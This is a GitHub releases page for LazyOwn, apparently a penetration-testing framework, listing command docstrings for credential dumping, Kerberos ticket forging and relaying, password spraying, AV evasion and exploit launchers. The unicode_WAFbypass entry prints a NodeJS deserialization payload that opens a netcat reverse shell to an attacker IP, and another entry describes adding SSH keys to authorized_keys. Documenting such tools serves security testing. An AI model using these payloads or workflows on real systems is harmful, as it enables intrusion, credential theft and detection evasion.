Releases: grisuno/LazyOwn

release/0.2.22

07 Dec 02:00
226aa62

What's Changed

Full Changelog: release/0.2.21...release/0.2.22

spraykatz

Executes the Spraykatz tool to retrieve credentials on Windows machines and large Active Directory environments.

This function:
- Installs Spraykatz if not already installed.
- Executes the Spraykatz command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, git, and nmap to be installed.
- Uses parameters from self.params for username, password, and target.

Usage:
spraykatz

caldera

Installs and starts the Caldera server.

This function:
- Clones the Caldera repository recursively.
- Installs the required dependencies.
- Optionally installs GoLang (1.19+).
- Starts the Caldera server with the provided parameters.

Behavior:
- Requires git, python3, and pip3 to be installed.
- Uses parameters from self.params for version/release.

Usage:
caldera

ntpdate

Synchronizes the system clock with a specified NTP server.

This method constructs the target NTP server address using the domain and subdomain
parameters. It then prompts the user to confirm or modify the target address.
Finally, it executes the ntpdate command to synchronize the system clock with
the specified NTP server.

:param line: The command line input (not used in this method).
:type line: str
:return: None

ticketer

Executes the Impacket ticketer tool to create a golden ticket.

This function performs the following actions:

  1. Checks if the target host is valid.
  2. Prompts the user for the NTLM hash, domain SID, domain name, DC IP, SPN, and username.
  3. Constructs and executes the Impacket ticketer command with the provided information.

Parameters:
line (str): A command argument to determine the authentication mode.
This parameter is not used in this function.

Returns:
None

links

Displays a list of useful links and allows the user to select and copy a link to the clipboard.

This function performs the following actions:

  1. Defines a list of links with their aliases.
  2. Filters the links based on the input line if provided.
  3. Displays the filtered links with their aliases and URLs.
  4. Prompts the user to select a link by entering the corresponding number.
  5. Copies the selected link to the clipboard.

Parameters:
line (str, optional): A string to filter the links. If provided, only the links containing
the string in their alias or URL will be displayed. Defaults to an empty string.

Returns:
None

rsync

Synchronizes the local "sessions" directory to a remote host using rsync, leveraging sshpass for automated authentication.

Steps:
1. Verifies if the credentials file exists in the "sessions" directory.
If not, prompts the user for a username and password.
2. Reads the credentials file if it exists and extracts the username and password.
3. Constructs an rsync command to deploy the "sessions" directory to the remote host.
4. Executes the rsync command using the system shell.

Args:
line (str): Input command line (not used in the current implementation).

Dependencies:
- The sshpass command-line tool must be installed on the local machine.
- rsync must be installed on both the local and remote machines.
- The remote host must be accessible via SSH.

Attributes:
- self.params: Dictionary containing the following keys:
- username (str, optional): Predefined username. Defaults to prompting the user if not provided.
- password (str, optional): Predefined password. Defaults to prompting the user if not provided.
- rhost (str): Remote host's IP or domain name.

Raises:
- KeyError: If rhost is not provided in self.params.
- FileNotFoundError: If the "sessions" directory does not exist.

Note:
- The credentials.txt file, if present, should have credentials in the format username:password
on the first line.

Returns:
None

pre2k

Executes the pre2k tool to query the domain for pre-Windows 2000 machine accounts or to pass a list of hostnames to test authentication.

This function:
- Installs pre2k if not already installed.
- Executes the pre2k command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
pre2k auth -u -p -d -dc-ip <dc_ip>
pre2k unauth -d -dc-ip <dc_ip> -inputfile

gmsadumper

Executes the gMSADumper tool to read and parse gMSA password blobs accessible by the user.

This function:
- Installs gMSADumper if not already installed.
- Executes the gMSADumper command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
gmsadumper -u -p -d
gmsadumper -u -p <LM:NT hash> -d -l <ldap_server>
gmsadumper -k -d -l <ldap_server>

dnschef

Executes the DNSChef tool to monitor DNS queries and intercept responses.

This function:
- Installs DNSChef if not already installed.
- Executes the DNSChef command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dnschef

dploot

Executes the dploot tool to loot DPAPI related secrets from local or remote targets.

Actions: backupkey, blob, browser, certificates, credentials, machinecertificates, machinecredentials, machinemasterkeys, machinevaults, masterkeys, mobaxterm, rdg, sccm, vaults, wam, wifi

This function:
- Installs dploot if not already installed.
- Executes the dploot command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dploot -d -u -p -t
dploot -k -d -t

banners

createpayload

Generates an obfuscated payload to evade AV detection using the payloadGenerator tool. Thanks to smokeme.

This function:
- Clones the payloadGenerator repository if not already cloned.
- Installs .NET Framework 4.5 if not already installed.
- Executes the generator.py script with the provided IP, port, and XOR key.
- Displays the result in the terminal.

Parameters:
line (str): Length of the XOR key.

Behavior:
- Requires git and dotnet to be installed.
- Uses parameters from self.params for IP, port, and XOR key.

Usage:
createpayload

bin2shellcode

Converts a binary file to a shellcode string in C or Nim format.

This function:
- Reads a binary file and converts its contents to a shellcode string.
- Supports both C and Nim formats.
- Displays the result in the terminal and saves it to a file.

Behavior:
- Requires the filename, width, quotes, and format parameters.
- Uses default values if parameters are not provided.
- Uses parameters from self.params for filename, width, quotes, and format.

Usage:
bin2shellcode [ [ [ []]]]

release/0.2.21

25 Nov 06:54
dc4b8d4

What's Changed

Full Changelog: release/0.2.20...release/0.2.21

utf

Encode a given payload into UTF-16 escape sequences.

This function takes a payload string and encodes each character into its
UTF-16 hexadecimal representation (e.g., A becomes A). If no
payload is provided as input, it prompts the user to input one, with a
default value of ' or 1=1-- -.

Parameters:
line (str): The input payload to encode. If empty, the user is prompted
to provide one interactively.

Returns:
None: The encoded payload is printed to the console.

dcomexec

Executes the Impacket dcomexec tool to run commands on a remote system using DCOM.

This function performs the following actions:

  1. Validates the target host (rhost) and domain parameters.
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt,
    allows the user to select credentials, and constructs the dcomexec command using them.
  3. If the line argument is "hash", it searches for a hash file, prompts the user for a username, and
    constructs the dcomexec command using the hash.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

pip_repo

Sets up a local pip repository and serves it via an HTTP server for offline installations.

This function performs the following actions:

  1. Creates a directory for storing pip packages if it does not already exist.
  2. Downloads a predefined list of Python packages along with their dependencies to the repository directory.
  3. Organizes the downloaded packages into their respective directories.
  4. Starts an HTTP server to host the repository, allowing remote machines to install the packages.

The repository path is created under the sessions directory, and the packages are served using Python's
built-in HTTP server at port 8008.

Parameters:
line (str): Optional argument for the command. Not used in this implementation but retained for compatibility
with the cmd2 framework.

Returns:
None

apt_repo

Creates a local APT repository and serves it via a web server.

This function performs the following actions:

  1. Creates a directory for storing .deb packages.
  2. Downloads the specified APT packages and their dependencies into the repository.
  3. Generates the necessary APT repository indexes.
  4. Starts a web server to host the repository for remote clients.

Parameters:
line (str): A space-separated list of package names to include in the repository.

Returns:
None

httprobe

Executes the httprobe tool to probe domains for working HTTP and HTTPS servers.

This function performs the following actions:

  1. Verifies if httprobe is installed; if not, it installs the tool automatically.
  2. Probes domains from the input file or standard input.
  3. Simplifies the user experience by minimizing required commands and leveraging self.params for defaults.

Parameters:
line (str): Optional command argument specifying the domain; if omitted, run just httprobe.
Example usage (just provide the domain):
httprobe example.com

Returns:
None

eyewitness_py

Automates EyeWitness installation and execution without requiring user input.

This function installs EyeWitness if it is not already available, uses a default input file
(urls.txt), and applies standard configurations to execute a web enumeration task
automatically. No arguments or manual intervention are needed from the user.

Behavior:
- Installs EyeWitness if missing.
- Uses urls.txt as the default input file.
- Sets a default timeout of 60 seconds.
- Automatically executes EyeWitness with predefined settings.

Usage:
witness

pup

Processes HTML content from a specified URL using the pup utility and a default CSS selector.

This function:
- Retrieves HTML content from the URL stored in self.params["url"] using curl.
- Filters the HTML content using the pup utility with a predefined CSS selector.
- Displays the filtered result in the terminal.

Behavior:
- Requires pup to be installed.
- Uses self.params["url"] as the source URL.
- Applies the CSS selector 'table table tr:nth-last-of-type(n+2) td.title a' by default.

Usage:
pup

recon

Performs reconnaissance on a specified domain using crt.sh (the target must be visible on the internet), pup, httprobe, and EyeWitness.

This function automates the process of gathering subdomains for a given domain, verifying
their reachability, and generating a report using the EyeWitness tool.

Workflow:
1. Determines the target domain from the line argument or defaults to self.params["domain"].
2. Queries the crt.sh certificate transparency logs for subdomains using curl.
3. Filters and extracts domain-related text data using pup.
4. Sorts and removes duplicate entries, then validates subdomains with httprobe.
5. Saves the results to a temporary file.
6. Executes EyeWitness to generate a web-based reconnaissance report for the subdomains.

Requirements:
- pup: A command-line HTML parser.
- httprobe: A tool to check live HTTP/HTTPS endpoints.
- EyeWitness: A tool for generating web reconnaissance reports.

Parameters:
line (str): The domain to target for reconnaissance. If omitted, the domain defaults to self.params["domain"].

Examples:
1. Specify a domain directly:
    >>> recon domain.com

2. Use the default domain from self.params:
    >>> recon

Raises:
None. Errors in execution will be logged or printed as part of the command output.

digdug

Executes Dig Dug to inflate the size of an executable file, leveraging pre-configured settings
and interactive input for minimal user effort.

This function integrates with the Dig Dug tool to increase an executable's size by appending
dictionary words. It automates repository setup, selects the input file from user prompts or defaults,
and uses sensible configurations to execute the inflation process. Dig Dug is particularly useful
for evading AV/EDR detections by exceeding size thresholds for analysis.

Behavior:
- Automatically clones the Dig Dug repository if not already present in external/.exploit/DigDug.
- Calls the venom command to prepare the necessary payloads for execution.
- Prompts the user to select an input executable and specify the desired size increase.
- Uses a default dictionary (google-10000-english-usa-gt5.txt) for padding.

Requirements:
- A Python environment with required dependencies.
- Executable files available in the working directory or sessions.

Usage:
Invoke this function to inflate the size of a generated payload or user-specified executable.
Interactive prompts will guide the input selection and size configuration.

Examples:
1. Increase the size of a selected payload by 100 MB:
    >>> digdug

2. Use the default configurations to inflate an executable:
    No additional parameters are required. The user is prompted for size and file selection.

adsso_spray

Performs a password spray attack on Azure Active Directory Seamless Single Sign-On (SSO) using a specified list of users.

This function automates the process of spraying a given password across multiple user accounts in a target domain. It utilizes
a user list in the form of a text file, targeting Azure AD Seamless SSO endpoints. The results are processed and saved to
a specified output file, providing insights into which accounts were successful or failed during the attack.

Requirements:
- A valid domain and URL for the target Azure AD instance (assign url https://url.com).
- A user dictionary file containing usernames (without the domain) to be sprayed.

Parameters:
line (str): Command-line input passed to the function (not currently used in the function).

Behavior:
- Loads the domain and URL from the configuration stored in self.params.
- Reads the user list from a file specified in get_users_dic.
- Sprays the specified password to all users and processes the results.
- Saves the successful and failed attempts to the output file.

Example:
- Perform a password spray attack with the password "admin" and save the results:
>>> adsso_spray
- Customize the password or user list by modifying self.params before invoking the function.

creds_py

Searches for default credentials associated with a specific product or vendor, using the Default Credentials Cheat Sheet.

This function automates the process of querying the Default Credentials Cheat Sheet for default credentials of various products.
It searches for the specified product or vendor, providing relevant default credentials for pentesters during engagements.

Behavior:
- Automatically clones the Default Credentials Cheat Sheet repository if not already present in external/.exploit/DefaultCreds.
- Executes a search command with the product/vendor specified by the user.
- Returns the default credentials for the requested product or vendor.

Requirements:
- Python environment with necessary dependencies.
- Access to the Default Credentials Cheat Sheet repository.

Usage:
Run this function to search for default credentials related to a product or vendor.
The user is p...

release/0.2.20

21 Nov 01:48
fc410d8

What's Changed

Full Changelog: release/0.2.19...release/0.2.20

getnthash_py

Executes the getnthash.py tool from PKINITtools to retrieve the NT hash using a Kerberos U2U TGS request.

This function performs the following actions:

  1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
  2. Retrieves the NT hash using the AS-REP key from a previously generated TGT.

Parameters:
line (str): Command arguments specifying the AS-REP key and target identity.
Expected format:
- identity
- Additional flags like -key KEY, -dc-ip ip address, etc.

Returns:
None

gets4uticket_py

Executes the gets4uticket.py tool from PKINITtools to request an S4U2Self service ticket using Kerberos.

This function performs the following actions:

  1. Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
  2. Requests a service ticket using the S4U2Self protocol and outputs it to the specified ccache file.

Parameters:
line (str): Command arguments specifying the kerberos_connection_url, SPN, target user, and ccache.
Expected format:
- kerberos_connection_url spn targetuser ccache
- Additional flags like -v for verbose output.

Returns:
None

aclpwn_py

Executes the aclpwn.py tool to find and exploit ACL paths for privilege escalation in an Active Directory environment.

This function performs the following actions:

  1. Checks if aclpwn is installed; if not, it installs the package.
  2. Finds an exploit path using specified starting and target points in Active Directory.
  3. Executes the path to escalate privileges if the path is found.

Parameters:
line (str): Command arguments specifying the find and target points, domain, and optional flags.
Expected format:
- -f starting_point -ft starting_type -d domain
- Additional flags like -t target, -tt target_type, --server, -dry, --restore, etc.

Returns:
None

addspn_py

Executes the addspn.py tool to manage Service Principal Names (SPNs) on Active Directory accounts via LDAP.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Adds, removes, or queries SPNs on the specified target based on the provided options.

Parameters:
line (str): Command arguments specifying the target hostname, user credentials, and SPN actions.
Expected format:
- hostname user password target spn -options
- Options include:
- -r to remove an SPN
- -q to query current SPNs
- -a to add SPN via msDS-AdditionalDnsHostName

Returns:
None

dnstool_py

Executes the dnstool.py tool to modify Active Directory-integrated DNS records.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Modifies DNS records by adding, removing, or querying based on the specified options.

Parameters:
line (str): Command arguments specifying the DNS action, target record, and data.
Expected format:
- hostname user password record action -options
- Options include:
- -a to add a record
- -r to remove a record
- --forest to target ForestDnsZones

Returns:
None

printerbug_py

Executes the printerbug.py tool to trigger the SpoolService bug via RPC backconnect.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Executes the printerbug tool to attempt an RPC backconnect to the specified attacker host.

Parameters:
line (str): Command arguments specifying the target and attacker host.
Expected format:
- target_username@target_host attacker_host

Returns:
None

krbrelayx_py

Executes the krbrelayx.py tool for Kerberos relaying or unconstrained delegation abuse.

This function performs the following actions:

  1. Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
  2. Relays Kerberos tickets or abuses unconstrained delegation to access target services.

Parameters:
line (str): Command arguments specifying the target and options.
Expected format:
- target options
- Options include:
- -t target_host to specify the target host
- -l loot directory to save TGTs or dump information

Returns:
None

autoblody

Executes the autobloody tool for automating Active Directory privilege escalation paths.

This function performs the following actions:

  1. Checks if autobloody is installed; if not, it clones the repository and installs dependencies.
  2. Executes the autobloody command to find and exploit privilege escalation paths.

Parameters:
line (str): Command arguments specifying the source and target objects and options.
Expected format:
- -u username for NTLM authentication
- -p password for NTLM authentication
- --host domain_controller_ip for the IP of the Domain Controller
- -dp neo4j_password for Neo4j database password
- -ds source_label for the source node label in BloodHound
- -dt target_label for the target node label in BloodHound

Returns:
None

upload_gofile

Uploads a file to Gofile storage.

This function performs the following actions:

  1. Prepares the file and folder ID for upload.
  2. Sends a POST request to Gofile API with the file and authorization token.
  3. Handles the response from the API and prints the result.

Parameters:
line (str): Command arguments specifying the file path and options.
Expected format:
- <file_path>
- Options include:
- --folderId <folder_id> to specify the folder where the file should be uploaded

Returns:
None

unicode_WAFbypass

We open a Netcat listener on port 443 and attempt to exploit NodeJS deserialization by sending the
following payload:
{"rce":"_$$ND_FUNC$$_function() {require('child_process').exec('nc -e /bin/bash 10.10.xx.xx 443',function(error,stdout,stderr) {console.log (stdout) });}()"}

Some WAFs can be bypassed with the use of Unicode characters.

Generate an obfuscated payload, encode it in base64, and append the SSH public key to the authorized_keys file.

Args:
ip_address (str): The IP address for the reverse shell connection.
port (int): The port for the reverse shell connection.
ssh_public_key (str): The SSH public key to add to authorized_keys.

Returns:
str: The base64-encoded obfuscated payload.

sqli_mssql_test

Initiates a reverse MSSQL shell by starting an HTTP server to handle incoming connections and exfiltrate data.

This function does the following:

  1. Starts an HTTP server to listen for connections from the MSSQL server.
  2. Intercepts and decodes responses from the target server.
  3. Prompts the user to enter commands, sends them to the target, and displays the output.

Parameters:
line (str): Unused command argument from the cmd2 prompt.

Returns:
None

targetedKerberoas

Executes the targetedKerberoast tool for extracting Kerberos service tickets.

This function performs the following actions:

  1. Verifies the presence of the targetedKerberoast tool; if not installed, it clones the repository and installs dependencies.
  2. Prompts for parameters such as the domain, username, and other configurations required by targetedKerberoast.
  3. Executes the targetedKerberoast tool with specified options for obtaining "kerberoastable" hashes.

Parameters:
line (str): Command arguments specifying the user, domain, and options.
Expected format:
- domain user hash or password [optional parameters]

Returns:
None

pyoracle2

Executes the pyOracle2 tool for performing padding oracle attacks.

This function performs the following actions:

  1. Verifies the presence of the pyOracle2 tool; if not installed, it clones the repository and installs dependencies.
  2. Prompts the user for configuration parameters or retrieves them from self.params to create a job-specific configuration file.
  3. Executes the pyOracle2 tool using the generated configuration file and specified options.

Parameters:
line (str): Command arguments specifying additional tool options if required.
Expected format: [optional parameters]

Returns:
None

paranoid_meterpreter

Creates and deploys a paranoid Meterpreter payload and listener with SSL/TLS pinning and UUID tracking.

This function performs the following actions:

  1. Generates a self-signed SSL/TLS certificate for payload encryption.
  2. Creates either staged or stageless Meterpreter payloads with UUID tracking and TLS pinning.
  3. Configures and launches a Metasploit listener for the payload.

Parameters:
line (str): Command arguments specifying target configurations.
Expected format:
- rhost lhost domain subdomain

Returns:
None

lfi

Exploits a potential Local File Inclusion (LFI) vulnerability by crafting
and sending HTTP GET requests to a specified URL.

The user can specify the target URL directly via the line parameter or
provide it interactively. If no URL is provided, the method uses a default
value stored...

release/0.2.19

18 Nov 11:19
a68b2f9

What's Changed

Full Changelog: release/0.2.18...release/0.2.19

release/0.2.18

17 Nov 06:21
cc16581

What's Changed

Full Changelog: release/0.2.17...release/0.2.18

release/0.2.17

12 Nov 02:15
40799a5

release/0.2.16

12 Nov 02:00
b76a51a

What's Changed

Full Changelog: release/0.2.15...release/0.2.16

follina

Executes the MSDT Follina exploit tool to create malicious documents for exploitation.

This function performs the following actions:

  1. Checks if follina.py is available; if not, it clones the repository and installs dependencies.
  2. If the line argument is "default", it runs the tool with default parameters to pop calc.exe.
  3. If the line argument is "notepad", it runs the tool to pop notepad.exe.
  4. If the line argument is "reverse", it prompts for a port and runs the tool to get a reverse shell.
  5. If the line does not match any valid options, it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the action mode.
- If "default", executes with default parameters.
- If "notepad", executes to pop notepad.exe.
- If "reverse", prompts for a port and executes for a reverse shell.
- If neither, displays an error message with usage instructions.

Returns:
None

sawks

Executes the Swaks (Swiss Army Knife for SMTP) tool to send test emails for phishing simulations.

This function performs the following actions:

  1. Checks if Swaks is available; if not, it clones the repository to the appropriate directory.
  2. Constructs the Swaks command with the specified 'to' and 'from' emails, server, and message body.
  3. Runs the command using Swaks to simulate email delivery.

Parameters:
line (str): Command argument specifying additional options or the message body.
- If not provided, defaults to a basic test message.

Returns:
None

ad_ldap_enum

Executes ad-ldap-enum to enumerate Active Directory objects (users, groups, computers)
through LDAP, collecting extended information on group memberships and additional AD details.

This function enables the enumeration of Active Directory users, groups, and computers
by executing LDAP queries on a specified domain controller. The command constructed allows
password or Pass-the-Hash authentication, supports SSL/TLS, and IPv4/IPv6 connections,
and outputs data into CSV files detailing domain group memberships and extended user/computer
information.

Functionalities include:

  1. Checking for credential availability and prompting for them if not found.
  2. Constructing an LDAP enumeration command with customizable authentication and server details.
  3. Executing ad-ldap-enum.py to output detailed information in CSV format.

The output files are saved in the current working directory with a prepend if specified.

Example command the function can build:

  • python3 ad-ldap-enum.py -d scrm.local -l 10.10.11.168 -u ksimpson -p ksimpson -v

Usage:
- Run dp_ad_ldap_enum to initiate AD object enumeration using ad-ldap-enum.

:param line: String containing initial command-line arguments or options.

unzip

Unzips a specified file from the sessions directory.

This function attempts to locate and unzip a file in the sessions directory.
If a filename is provided as line, it will use that; otherwise, it will attempt
to retrieve a zip file name based on existing zip files in the user's dictionary.
If the zip file is not found or does not exist in the sessions path, it prints
an error message.

Steps of execution:

  1. Determines the zip file name from line or user dictionary.
  2. Checks if the zip file exists within the sessions path.
  3. Builds the unzip command and executes it to extract the contents of the zip file.

Usage example:
unzip filename.zip

:param line: The zip filename to be extracted. If empty, a zip file will be selected
automatically if available.
:return: None

regeorg

Executes the reGeorg tool for HTTP(s) tunneling through a SOCKS proxy.

This function performs the following actions:

  1. Checks if the reGeorg tool is installed; if not, it clones the repository and sets up the environment.
  2. Validates the command line arguments, specifically the port and URL required for the SOCKS proxy.
  3. Constructs the command to run the reGeorg SOCKS proxy with the specified options and executes it.
  4. Provides usage instructions in case of incorrect command line argument formats.

Parameters:
line (str): Command argument specifying the parameters for the reGeorg execution.
- The expected format is: " ", where is the listening port and is the URL
containing the tunnel script.

Returns:
None

rocky

Reduces a wordlist based on the specified password length.

This function filters the provided wordlist to only include passwords
that match the specified length. If no length is provided, it defaults
to 4. The function constructs a grep command to achieve this and executes
it.

Usage:
do_rocky(line: str)

:param line: The length of the passwords to filter in the wordlist.
This parameter should be a string representing a positive integer.
If not provided, the function prompts the user for input.
:type line: str
:raises ValueError: If the provided length is not a valid positive integer.

Example:
do_rocky('8')
# Executes: grep '^.{8}$' /usr/share/wordlists/rockyou.txt > sessions/lazypass_mini_rocky.txt

release/0.2.15

08 Nov 04:46
e5af1e5

What's Changed

  • too many commands documented at COMMANDS.md by @grisuno in #59

Full Changelog: release/0.2.14...release/0.2.15

name_the_hash

Identify hash type using nth after retrieving it with get_hash().

:param line: Line input for any additional parameters.

:returns: None

Manual execution:
To manually identify the hash, use the following command:

nth -t "{hash}"

This function fetches the hash using get_hash() and identifies its type. If nth is not installed, it is automatically installed.

refill_password

Generate a list of possible passwords by filling each asterisk in the input with user-specified characters.

:param line: A string containing asterisks (e.g., WebAO***7) for generating variations.

:returns: None

Process:
Prompts the user to enter characters to replace each asterisk, creates all possible combinations,
and saves them to 'sessions/passwords_refilled.txt'. If this file exists, the previous version is
renamed with a timestamp suffix.

sudo

Checks if the script is running with superuser (sudo) privileges, and if not,
restarts the script with sudo privileges.

This function verifies if the script is being executed with root privileges
by checking the effective user ID. If the script is not running as root,
it prints a warning message and restarts the script using sudo.

:return: None

netview

Executes the Impacket netview tool to list network shares on a specified target.

This function performs the following actions:

  1. Checks if the target host is valid.
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
    and allows the user to select which file to use for executing the command.
  3. If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
    and executes the command with the hash.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

wmiexec

Executes the Impacket WMIExec tool to run commands on a target system using WMI.

This function performs the following actions:

  1. Checks if the target IP is valid.
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
    and allows the user to select which file to use for executing the command.
  3. If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
    and executes the command with the hash.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

extract_ports

Extracts open ports and IP address information from a specified file.

This function performs the following actions:

  1. Reads the specified file to find open ports.
  2. If no port is passed as an argument, extracts the first unique IP address found in the file.
  3. Prints the extracted information to the console.

Parameters:
line (str): The port to get information for.

Returns:
None

cron

Schedules a command to run at a specified time.

This function allows users to schedule a command to execute at a specific hour and minute.
If the specified time has already passed for the current day, the command will be scheduled
to run the following day.

Usage:
cron HH:MM command [args]

Parameters:
line (str): The input string containing the scheduled time in 'HH:MM' format followed by the command and arguments.

Returns:
None

pezorsh

Executes the PEzor tool to pack executables or shellcode with custom configurations.

This function enables the user to construct commands for PEzor with various options.
By default, it prompts for each parameter so that execution does not fail because of
missing values. It supports both executable and shellcode packing, with the ability to
select from a range of PEzor flags to create the desired payload.

The function's capabilities include:

  1. Prompting the user to specify if they want to pack an executable or shellcode.
  2. Gathering parameters for different PEzor flags based on user choices.
  3. Building the command dynamically to execute PEzor.sh with the configured options.

Example commands the function can build:

  • Pack an executable with 64-bit, debug, and anti-debug options.
  • Pack shellcode with self-injection and sleep options.

Usage:
- Run 'PEzor [donut args...]' to pack an executable with donut options.
- Run 'PEzor ' to pack shellcode.

:param line: String containing initial command-line arguments or options.

mimikatzpy

Executes the Impacket Mimikatz tool to interact with a target system for credential-related operations.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
    and prompts the user to select a file for executing Mimikatz.
  3. If line is "hash", it searches for a hash file, prompts for a username, and constructs the command using
    the hash for authentication.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "hash", it uses a hash file for authentication.
If neither, it displays an error message with usage instructions.

Returns:
None

rdp_check_py

Executes the RDP check tool to verify credentials or hash-based authentication on a target system.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
    and prompts the user to select one to execute the RDP check.
  3. If line is "hash", it searches for a hash file, prompts the user for a username, and constructs the command
    using the hash for authentication.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "hash", it uses a hash file for authentication.
If neither, it displays an error message with usage instructions.

Returns:
None

mqtt_check_py

Executes the MQTT check tool to verify credentials on a target system with optional SSL.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
    and prompts the user to select one to execute the MQTT check.
  3. If line is "ssl", it performs the MQTT check with SSL enabled using the selected credentials.
  4. If line does not match "pass" or "ssl", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "ssl", it authenticates using SSL.
If neither, it displays an error message with usage instructions.

Returns:
None

lookupsid_py

Executes the LookupSID tool to perform SID enumeration on a target system.

This function performs the following actions:

  1. Validates the target IP (rhost).
  2. If the line argument is "basic", it searches for credential files with the pattern credentials*.txt
    and prompts the user to select one to execute the SID lookup.
  3. If line is "dc-target", it performs the SID lookup specifying domain controller and target IPs,
    using the selected credentials.
  4. If line does not match "basic" or "dc-target", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the lookup mode.
If "basic", the function performs a standard SID lookup.
If "dc-target", it includes -dc-ip and -target-ip arguments.
If neither, it displays an error message with usage instructions.

Returns:
None

scavenger

Executes the Scavenger tool for multi-threaded post-exploitation scanning on target systems with SMB credentials.

This function performs the following actions:

  1. Checks if Scavenger is installed; if not, it clones the repository and installs dependencies.
  2. If the line argument is "pass", it searches for credential files matching credentials*.txt,
    prompts the user to select one, and executes Scavenger using the chosen credentials on a single target IP.
  3. If the line argument is "targets", it prompts for an IP list file (iplist) and uses Scavenger with
    credentials from a selected file on multiple target IPs with the --overwrite option.
  4. If line does not match "pass" or "targets", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
- If "pass", authenticates with c...


release/0.2.14

04 Nov 01:27
release/0.2.14
63e8710

What's Changed

  • too many commands documented at COMMANDS.md by @grisuno in #57

Full Changelog: release/0.2.13...release/0.2.14

release/0.2.13

01 Nov 05:42
release/0.2.13
bd201b0

Full Changelog: release/0.2.12...release/0.2.13

pykerbrute

Command pykerbrute: Automates the installation and execution of PyKerbrute for bruteforcing Active Directory accounts using Kerberos pre-authentication.

This function performs the following tasks:

  1. Clones and installs PyKerbrute if not already installed.
  2. Allows the user to choose between the EnumADUser.py and ADPwdSpray.py scripts.
  3. Executes the selected script with user-defined parameters, including domain, mode (TCP/UDP), and selected hash or password.

Args:
line (str): Optional argument for specifying additional parameters for execution, such as domain controller, domain, and attack mode.

Returns:
None

reg_py

Run reg.py with specified parameters to query the registry.

:param line: Line input for any additional parameters.

:returns: None

Manual execution:
To manually run reg.py, use the following command:

reg.py -hashes :<hash> <domain>/<username>@<target> query -keyName <registry_key>

This function prompts the user for the hash, domain, username, and registry key if they are not already provided.

name_the_hash

Identify hash type using nth after retrieving it with get_hash().

:param line: Line input for any additional parameters.

:returns: None

Manual execution:
To manually identify the hash, use the following command:

nth -t "{hash}"

This function fetches the hash using get_hash() and identifies its type. If nth is not installed, it is automatically installed.

refill_password

Generate a list of possible passwords by filling each asterisk in the input with user-specified characters.

:param line: A string containing asterisks (e.g., WebAO***7) for generating variations.

:returns: None

Process:
Prompts the user to enter characters to replace each asterisk, creates all possible combinations,
and saves them to 'sessions/passwords_refilled.txt'. If this file exists, the previous version is
renamed with a timestamp suffix.

sudo

Checks if the script is running with superuser (sudo) privileges, and if not,
restarts the script with sudo privileges.

This function verifies if the script is being executed with root privileges
by checking the effective user ID. If the script is not running as root,
it prints a warning message and restarts the script using sudo.

:return: None

netview

Executes the Impacket netview tool to list network shares on a specified target.

This function performs the following actions:

  1. Checks if the target host is valid.
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
    and allows the user to select which file to use for executing the command.
  3. If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
    and executes the command with the hash.
  4. If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

wmiexec

Executes the Impacket WMIExec tool to run commands on a target system using WMI.

This function performs the following actions:

  1. Checks if the target IP is valid.
  2. If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
    and allows the user to select which file to use for executing the command.
  3. If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
    and executes the command with the hash.
